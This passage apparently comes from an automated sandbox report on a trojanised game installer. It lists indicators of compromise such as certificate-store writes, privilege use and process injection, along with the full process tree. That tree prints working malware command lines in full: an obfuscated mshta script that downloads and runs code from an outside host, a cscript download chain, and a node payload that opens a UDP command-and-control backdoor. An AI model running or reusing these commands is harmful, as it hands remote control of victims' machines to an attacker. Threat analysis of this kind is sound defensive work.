2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	5TbjRG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	5TbjRG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	5TbjRG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	5TbjRG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	5TbjRG.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Garbage Cleaner.exe

NTFS ADS 2 IoCs

Processes:

node.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\40867d2a760ef1a6:ads	node.exe
File created	C:\ProgramData\DNTException\node.exe:dc2467ba821c94153074680f2b7931c4	node.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	35	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	37	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

Anime-Fighters-Infin_734316524.tmpExpedita.exeMsiExec.exeMsiExec.exemsiexec.exenode.exe

pid	process
1864	Anime-Fighters-Infin_734316524.tmp
1864	Anime-Fighters-Infin_734316524.tmp
1748	Expedita.exe
1748	Expedita.exe
1748	Expedita.exe
1564	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
516	msiexec.exe
516	msiexec.exe
2436	node.exe
2436	node.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exe5TbjRG.exe

description	pid	process
Token: SeRestorePrivilege	516	msiexec.exe
Token: SeTakeOwnershipPrivilege	516	msiexec.exe
Token: SeSecurityPrivilege	516	msiexec.exe
Token: SeCreateTokenPrivilege	1268	5TbjRG.exe
Token: SeAssignPrimaryTokenPrivilege	1268	5TbjRG.exe
Token: SeLockMemoryPrivilege	1268	5TbjRG.exe
Token: SeIncreaseQuotaPrivilege	1268	5TbjRG.exe
Token: SeMachineAccountPrivilege	1268	5TbjRG.exe
Token: SeTcbPrivilege	1268	5TbjRG.exe
Token: SeSecurityPrivilege	1268	5TbjRG.exe
Token: SeTakeOwnershipPrivilege	1268	5TbjRG.exe
Token: SeLoadDriverPrivilege	1268	5TbjRG.exe
Token: SeSystemProfilePrivilege	1268	5TbjRG.exe
Token: SeSystemtimePrivilege	1268	5TbjRG.exe
Token: SeProfSingleProcessPrivilege	1268	5TbjRG.exe
Token: SeIncBasePriorityPrivilege	1268	5TbjRG.exe
Token: SeCreatePagefilePrivilege	1268	5TbjRG.exe
Token: SeCreatePermanentPrivilege	1268	5TbjRG.exe
Token: SeBackupPrivilege	1268	5TbjRG.exe
Token: SeRestorePrivilege	1268	5TbjRG.exe
Token: SeShutdownPrivilege	1268	5TbjRG.exe
Token: SeDebugPrivilege	1268	5TbjRG.exe
Token: SeAuditPrivilege	1268	5TbjRG.exe
Token: SeSystemEnvironmentPrivilege	1268	5TbjRG.exe
Token: SeChangeNotifyPrivilege	1268	5TbjRG.exe
Token: SeRemoteShutdownPrivilege	1268	5TbjRG.exe
Token: SeUndockPrivilege	1268	5TbjRG.exe
Token: SeSyncAgentPrivilege	1268	5TbjRG.exe
Token: SeEnableDelegationPrivilege	1268	5TbjRG.exe
Token: SeManageVolumePrivilege	1268	5TbjRG.exe
Token: SeImpersonatePrivilege	1268	5TbjRG.exe
Token: SeCreateGlobalPrivilege	1268	5TbjRG.exe
Token: SeCreateTokenPrivilege	1268	5TbjRG.exe
Token: SeAssignPrimaryTokenPrivilege	1268	5TbjRG.exe
Token: SeLockMemoryPrivilege	1268	5TbjRG.exe
Token: SeIncreaseQuotaPrivilege	1268	5TbjRG.exe
Token: SeMachineAccountPrivilege	1268	5TbjRG.exe
Token: SeTcbPrivilege	1268	5TbjRG.exe
Token: SeSecurityPrivilege	1268	5TbjRG.exe
Token: SeTakeOwnershipPrivilege	1268	5TbjRG.exe
Token: SeLoadDriverPrivilege	1268	5TbjRG.exe
Token: SeSystemProfilePrivilege	1268	5TbjRG.exe
Token: SeSystemtimePrivilege	1268	5TbjRG.exe
Token: SeProfSingleProcessPrivilege	1268	5TbjRG.exe
Token: SeIncBasePriorityPrivilege	1268	5TbjRG.exe
Token: SeCreatePagefilePrivilege	1268	5TbjRG.exe
Token: SeCreatePermanentPrivilege	1268	5TbjRG.exe
Token: SeBackupPrivilege	1268	5TbjRG.exe
Token: SeRestorePrivilege	1268	5TbjRG.exe
Token: SeShutdownPrivilege	1268	5TbjRG.exe
Token: SeDebugPrivilege	1268	5TbjRG.exe
Token: SeAuditPrivilege	1268	5TbjRG.exe
Token: SeSystemEnvironmentPrivilege	1268	5TbjRG.exe
Token: SeChangeNotifyPrivilege	1268	5TbjRG.exe
Token: SeRemoteShutdownPrivilege	1268	5TbjRG.exe
Token: SeUndockPrivilege	1268	5TbjRG.exe
Token: SeSyncAgentPrivilege	1268	5TbjRG.exe
Token: SeEnableDelegationPrivilege	1268	5TbjRG.exe
Token: SeManageVolumePrivilege	1268	5TbjRG.exe
Token: SeImpersonatePrivilege	1268	5TbjRG.exe
Token: SeCreateGlobalPrivilege	1268	5TbjRG.exe
Token: SeCreateTokenPrivilege	1268	5TbjRG.exe
Token: SeAssignPrimaryTokenPrivilege	1268	5TbjRG.exe
Token: SeLockMemoryPrivilege	1268	5TbjRG.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Anime-Fighters-Infin_734316524.tmp5TbjRG.exe

pid process

1864 Anime-Fighters-Infin_734316524.tmp
1268 5TbjRG.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Anime-Fighters-Infin_734316524.exeAnime-Fighters-Infin_734316524.tmpExpedita.exemsiexec.exe5TbjRG.exeMsiExec.exe4k3pJuomY9ufA5v.execmd.exe52225395540.exe

description	pid	process	target process
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	Anime-Fighters-Infin_734316524.tmp
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	Anime-Fighters-Infin_734316524.tmp
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	Anime-Fighters-Infin_734316524.tmp
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	Anime-Fighters-Infin_734316524.tmp
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	Anime-Fighters-Infin_734316524.tmp
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	Anime-Fighters-Infin_734316524.tmp
PID 1988 wrote to memory of 1864	1988	Anime-Fighters-Infin_734316524.exe	Anime-Fighters-Infin_734316524.tmp
PID 1864 wrote to memory of 1748	1864	Anime-Fighters-Infin_734316524.tmp	Expedita.exe
PID 1864 wrote to memory of 1748	1864	Anime-Fighters-Infin_734316524.tmp	Expedita.exe
PID 1864 wrote to memory of 1748	1864	Anime-Fighters-Infin_734316524.tmp	Expedita.exe
PID 1864 wrote to memory of 1748	1864	Anime-Fighters-Infin_734316524.tmp	Expedita.exe
PID 1748 wrote to memory of 1360	1748	Expedita.exe	4k3pJuomY9ufA5v.exe
PID 1748 wrote to memory of 1360	1748	Expedita.exe	4k3pJuomY9ufA5v.exe
PID 1748 wrote to memory of 1360	1748	Expedita.exe	4k3pJuomY9ufA5v.exe
PID 1748 wrote to memory of 1360	1748	Expedita.exe	4k3pJuomY9ufA5v.exe
PID 1748 wrote to memory of 1268	1748	Expedita.exe	5TbjRG.exe
PID 1748 wrote to memory of 1268	1748	Expedita.exe	5TbjRG.exe
PID 1748 wrote to memory of 1268	1748	Expedita.exe	5TbjRG.exe
PID 1748 wrote to memory of 1268	1748	Expedita.exe	5TbjRG.exe
PID 1748 wrote to memory of 1268	1748	Expedita.exe	5TbjRG.exe
PID 1748 wrote to memory of 1268	1748	Expedita.exe	5TbjRG.exe
PID 1748 wrote to memory of 1268	1748	Expedita.exe	5TbjRG.exe
PID 516 wrote to memory of 1564	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1564	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1564	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1564	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1564	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1564	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1564	516	msiexec.exe	MsiExec.exe
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	msiexec.exe
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	msiexec.exe
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	msiexec.exe
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	msiexec.exe
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	msiexec.exe
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	msiexec.exe
PID 1268 wrote to memory of 612	1268	5TbjRG.exe	msiexec.exe
PID 516 wrote to memory of 288	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 288	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 288	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 288	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 288	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 288	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 288	516	msiexec.exe	MsiExec.exe
PID 288 wrote to memory of 1892	288	MsiExec.exe	taskkill.exe
PID 288 wrote to memory of 1892	288	MsiExec.exe	taskkill.exe
PID 288 wrote to memory of 1892	288	MsiExec.exe	taskkill.exe
PID 288 wrote to memory of 1892	288	MsiExec.exe	taskkill.exe
PID 516 wrote to memory of 1648	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1648	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1648	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1648	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1648	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1648	516	msiexec.exe	MsiExec.exe
PID 516 wrote to memory of 1648	516	msiexec.exe	MsiExec.exe
PID 1360 wrote to memory of 1384	1360	4k3pJuomY9ufA5v.exe	cmd.exe
PID 1360 wrote to memory of 1384	1360	4k3pJuomY9ufA5v.exe	cmd.exe
PID 1360 wrote to memory of 1384	1360	4k3pJuomY9ufA5v.exe	cmd.exe
PID 1360 wrote to memory of 1384	1360	4k3pJuomY9ufA5v.exe	cmd.exe
PID 1384 wrote to memory of 1972	1384	cmd.exe	52225395540.exe
PID 1384 wrote to memory of 1972	1384	cmd.exe	52225395540.exe
PID 1384 wrote to memory of 1972	1384	cmd.exe	52225395540.exe
PID 1384 wrote to memory of 1972	1384	cmd.exe	52225395540.exe
PID 1972 wrote to memory of 996	1972	52225395540.exe	mshta.exe
PID 1972 wrote to memory of 996	1972	52225395540.exe	mshta.exe

Views/modifies file attributes 1 TTPs 6 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

7044 attrib.exe
2600 attrib.exe
2612 attrib.exe
7008 attrib.exe
7020 attrib.exe
7032 attrib.exe

pid	process
7044	attrib.exe
2600	attrib.exe
2612	attrib.exe
7008	attrib.exe
7020	attrib.exe
7032	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe
"C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1988

C:\Users\Admin\AppData\Local\Temp\is-OUETP.tmp\Anime-Fighters-Infin_734316524.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OUETP.tmp\Anime-Fighters-Infin_734316524.tmp" /SL5="$40158,3656070,140800,C:\Users\Admin\AppData\Local\Temp\Anime-Fighters-Infin_734316524.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1864

C:\Program Files (x86)\Vel\magnam\Expedita.exe
"C:\Program Files (x86)\Vel/\magnam\Expedita.exe" 32cb7aca069a0c8bb8d51fccce1d3826
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1748

C:\Users\Admin\AppData\Local\Temp\yXIKetvm\4k3pJuomY9ufA5v.exe
C:\Users\Admin\AppData\Local\Temp\yXIKetvm\4k3pJuomY9ufA5v.exe /usthree SUB=32cb7aca069a0c8bb8d51fccce1d3826
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{nXa0-XLbu0-rMHG-kzyWB}\52225395540.exe"
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1384

C:\Users\Admin\AppData\Local\Temp\{nXa0-XLbu0-rMHG-kzyWB}\52225395540.exe
"C:\Users\Admin\AppData\Local\Temp\{nXa0-XLbu0-rMHG-kzyWB}\52225395540.exe"
6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\SysWOW64\mshta.exe
mshta "javascript:document.write();0;y=unescape('%320%33%7E%68t%74p%3A%2F%2Fa%73u%310%2Ef%75n%2Fh%72i%2F%3F%321%616%654%62%7E%330').split('~');240;try{x='WinHttp';235;x=new ActiveXObject(x+'.'+x+'Request.5.1');239;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);72;x.send();82;y='ipt.S';78;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);196;}catch(e){};2;;window.close();"
7⤵
- Blocklisted process makes network request
PID:996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1630610062060.txt & cscript /nologo /e:jscript get1630610062060.txt "http%3A%2F%2Fasu10.fun%2Fhri%2F%3F202e13180%26b%3D95aeba91" node.cab & expand node.cab node.exe & del get1630610062060.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1630610062060.txt & cscript /nologo /e:jscript get1630610062060.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%2702e13180%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1630610062060.txt
8⤵
PID:2132

C:\Windows\SysWOW64\cscript.exe
cscript /nologo /e:jscript get1630610062060.txt "http%3A%2F%2Fasu10.fun%2Fhri%2F%3F202e13180%26b%3D95aeba91" node.cab
9⤵
- Blocklisted process makes network request
PID:2180

C:\Windows\SysWOW64\expand.exe
expand node.cab node.exe
9⤵
- Drops file in Windows directory
PID:2364

C:\Windows\SysWOW64\cscript.exe
cscript /nologo /e:jscript get1630610062060.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%2702e13180%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
9⤵
- Loads dropped DLL
PID:2380

C:\ProgramData\DNTException\node.exe
"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%2702e13180%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
10⤵
- Executes dropped EXE
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2436

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c dir C:\
11⤵
PID:2552

C:\Windows\SysWOW64\cacls.exe
cacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F
11⤵
PID:2568

C:\Windows\SysWOW64\icacls.exe
icacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)
